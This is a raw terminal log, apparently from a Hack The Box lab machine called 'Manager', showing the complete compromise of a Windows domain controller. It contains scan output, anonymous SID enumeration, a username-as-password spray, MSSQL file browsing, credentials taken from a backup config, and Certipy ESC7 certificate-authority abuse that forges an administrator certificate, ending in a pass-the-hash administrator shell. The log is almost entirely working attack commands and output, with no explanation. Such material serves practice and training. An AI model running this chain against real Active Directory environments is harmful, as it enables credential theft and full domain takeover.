PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-09 15:20:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
|_ssl-date: 2025-09-09T15:22:27+00:00; +7h00m50s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
| ms-sql-info:
|   10.129.235.134:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-09T15:10:54
| Not valid after: 2055-09-09T15:10:54
| MD5: d180:ef3e:9a36:78fe:5a0f:44f5:fa37:301d
|_SHA-1: be6e:f7b3:9128:02ad:50df:3e19:5912:a27d:d20b:d273
| ms-sql-ntlm-info:
|   10.129.235.134:1433:
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-09T15:22:27+00:00; +7h00m50s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
49734/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m50s, deviation: 0s, median: 7h00m50s
| smb2-time:
|   date: 2025-09-09T15:21:50
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
└──╼ [★]$ smbclient -L \\\\10.129.235.134 -N
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.235.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
└──╼ [★]$ impacket-lookupsid anonymous@manager.htb -no-pass
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at manager.htb
[*] StringBinding ncacn_np:manager.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
<SNIP>
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
└──╼ [★]$ nxc smb 10.129.235.134 -u usernames.txt -p usernames.txt --no-bruteforce
SMB 10.129.235.134 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.235.134 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\chinHae:chinHae STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [+] manager.htb\operator:operator
└──╼ [★]$ impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>
SQL (MANAGER\Operator guest@master)> xp_dirtree \
subdirectory                depth   file
-------------------------   -----   ----
$Recycle.Bin                    1      0
Documents and Settings          1      0
inetpub                         1      0
PerfLogs                        1      0
Program Files                   1      0
Program Files (x86)             1      0
ProgramData                     1      0
Recovery                        1      0
SQL2019                         1      0
System Volume Information       1      0
Users                           1      0
Windows                         1      0
SQL (MANAGER\Operator guest@master)> xp_dirtree \inetpub\wwwroot
subdirectory                      depth   file
-------------------------------   -----   ----
about.html                            1      1
contact.html                          1      1
css                                   1      0
images                                1      0
index.html                            1      1
js                                    1      0
service.html                          1      1
web.config                            1      1
website-backup-27-07-23-old.zip       1      1
└──╼ [★]$ ls -la
total 68
drwxr-xr-x 5 knuckl3s knuckl3s 4096 Sep 9 03:51 .
drwxr-xr-x 6 knuckl3s knuckl3s 4096 Sep 9 03:51 ..
-rw-r--r-- 1 knuckl3s knuckl3s 5386 Jul 27 2023 about.html
-rw-r--r-- 1 knuckl3s knuckl3s 5317 Jul 27 2023 contact.html
drwxr-xr-x 2 knuckl3s knuckl3s 4096 Sep 9 03:51 css
drwxr-xr-x 2 knuckl3s knuckl3s 4096 Sep 9 03:51 images
-rw-r--r-- 1 knuckl3s knuckl3s 18203 Jul 27 2023 index.html
drwxr-xr-x 2 knuckl3s knuckl3s 4096 Sep 9 03:51 js
-rw-r--r-- 1 knuckl3s knuckl3s 698 Jul 27 2023 .old-conf.xml
-rw-r--r-- 1 knuckl3s knuckl3s 7900 Jul 27 2023 service.html
└──╼ [★]$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.manager.htb</host>
    <open-port enabled="true">389</open-port>
    <secure-port enabled="false">0</secure-port>
    <search-base>dc=manager,dc=htb</search-base>
    <server-type>microsoft</server-type>
    <access-user>
      <user>raven@manager.htb</user>
      <password>R4v3n<SNIP></password>
    </access-user>
    <uid-attribute>cn</uid-attribute>
  </server>
  <search type="full">
    <dir-list>
      <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
    </dir-list>
  </search>
</ldap-conf>
└──╼ [★]$ evil-winrm -i 10.129.235.134 -u raven -p 'R4v3n<SNIP>'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>
└──╼ [★]$ certipy find -u raven -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.235.134:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.235.134
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -list-templates
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Enabled certificate templates on 'manager-dc01-ca':
SubCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
Administrator
└──╼ [★]$ certipy req -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 19
Would you like to save the private key? (y/N) y
[*] Saved private key to 19.key
[-] Failed to request certificate
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.235.134:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.235.134
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -issue-request 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
└──╼ [★]$ certipy req -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -retrieve 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 19
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '19.key'
[*] Saved certificate and private key to 'administrator.pfx'
└──╼ [★]$ evil-winrm -i manager.htb -u administrator -H ae50<SNIP>24ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
839b<SNIP>4e88